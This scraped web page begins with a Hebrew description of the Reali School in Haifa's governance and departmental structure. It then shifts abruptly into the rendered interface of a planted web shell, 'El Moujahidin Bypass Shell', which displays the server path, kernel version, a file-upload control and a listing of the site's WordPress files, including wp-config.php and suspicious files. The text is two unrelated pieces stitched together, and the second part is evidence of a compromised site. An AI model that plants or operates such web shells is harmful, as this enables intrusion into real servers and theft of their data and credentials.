מבנה בית הספר

בית הספר הריאלי העברי בחיפה הנו חברה בע"מ, המוכרת כמוסד חל"ץ (חברה לתועלת הציבור). במערכת החינוך הישראלית הוא משתייך לקטגוריה של בתי ספר "מוכרים שאינם רשמיים". במסגרת זו מחויב בית הספר למסגרות הפדגוגיות והמנהליות של משרד החינוך ונתון לפיקוחו. עם זאת, רשאי בית הספר לבחור את תלמידיו ואת מוריו על פי מערכת של ערכים ומדדים שאותם הוא מגדיר.

ה"ריבון" על בית הספר הינו "חבר הנאמנים", שמורכב מנציגי ציבור ומנציגי קהילת בית הספר ומונה 40 חברים: הורים, מורים, בוגרים, נציגי הטכניון, אוניברסיטת חיפה, עיריית חיפה, משרד החינוך וצה"ל. הוועד המנהל שנבחר מתוך "חבר הנאמנים" מונה תשעה חברים ובהם יו"ר ועד ההורים, והוא שמקיים את הפיקוח הישיר על עבודתה של הנהלת בית הספר.

הנהלת בית הספר כוללת את המנהל הכללי ולו סגנית – הסמנכ"לית לפדגוגיה.  בנוסף להם, מכהנים בהנהלה גם מנהל המינהל והכספים, ששת מנהלי הסניפים ומנהלת הגנים. מחלקת משאבי האנוש של בית הספר כפופה למנהל הכללי. ראוי לציין, כי יו"ר חבר הנאמנים, יו"ר הוועד המנהל ושלושה מתוך תשעת החברים בהנהלת בית הספר נמנים על בוגריו.

לצד ההנהלה והסניפים מפעיל בית הספר מחלקות מנהלה מגוונות, העומדות לשירותה של קהילת בית הספר בתחומי אחריות שונים. המחלקות בתחומי המִנהל: כספים ושכר לימוד, שיווק והרשמה, רכש ותשתיות – מנוהלות בידי מנהל המִנהל וכספים; המחלקות בתחומי הפדגוגיה: פיתוח פדגוגי, הערכה ומדידה, תחום הפרט, ייעוץ חינוכי, ספריות, גדנ"ע ומשלחות – מנוהלות בידי הסמנכ"לית לפדגוגיה.

בתרשים הבא תוכלו ללמוד על המבנה הארגוני שלנו, על מחלקותיו של בית הספר ועל החלוקה לסניפים:

מסגרת מלאה – כפיפות מלאה
מסגרת מקווקוות – ניהול מקצועי בלבד / מיקום גיאוגרפי בלבד ללא כפיפות

El Moujahidin Bypass Shell

Current Path : /home/reali/public_html/

Linux danreali 3.13.0-68-generic #111-Ubuntu SMP Fri Nov 6 18:17:06 UTC 2015 x86_64
Upload File :

Name
Size
Permissions
Options
.usermin
--
drwx------
biram-courses-2017
--
drwxr-xr-x
booklet
--
drwxr-xr-x
invention
--
drwxr-xr-x
maps
--
drwxr-xr-x
meydaon-biram
--
drwxr-xr-x
org
--
drwxr-xr-x
phpmyadmin
--
drwxr-xr-x
reali-100
--
drwxr-xr-x
reg
--
drwxr-xr-x
shapira
--
drwxr-xr-x
shapira-2014
--
drwxr-xr-x
truma
--
drwxr-xr-x
wp-admin
--
drwxr-xr-x
wp-content
--
drwxr-xr-x
wp-includes
--
drwxr-xr-x
.htaccess
0.678 KB
-rw-r--r--
google3b31a5353cb3d20d.html
0.052 KB
-rw-r--r--
index.php
0.408 KB
-rw-r--r--
license.txt
19.468 KB
-rw-r--r--
readme.html
7.259 KB
-rw-r--r--
ttt.php
0.067 KB
-rw-r--r--
wp-activate.php
5.319 KB
-rw-r--r--
wp-blog-header.php
0.355 KB
-rw-r--r--
wp-class.php
25.106 KB
-rw-r--r--
wp-comments-post.php
1.589 KB
-rw-r--r--
wp-config-sample.php
2.786 KB
-rw-r--r--
wp-config.php
3.874 KB
-rw-r--r--
wp-cron.php
3.209 KB
-rw-r--r--
wp-links-opml.php
2.365 KB
-rw-r--r--
wp-load.php
3.224 KB
-rw-r--r--
wp-login.php
33.144 KB
-rw-r--r--
wp-mail.php
7.859 KB
-rw-r--r--
wp-settings.php
15.874 KB
-rw-r--r--
wp-signup.php
29.195 KB
-rw-r--r--
wp-trackback.php
4.407 KB
-rw-r--r--
xmlrpc.php
2.993 KB
-rw-r--r--

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: [email protected]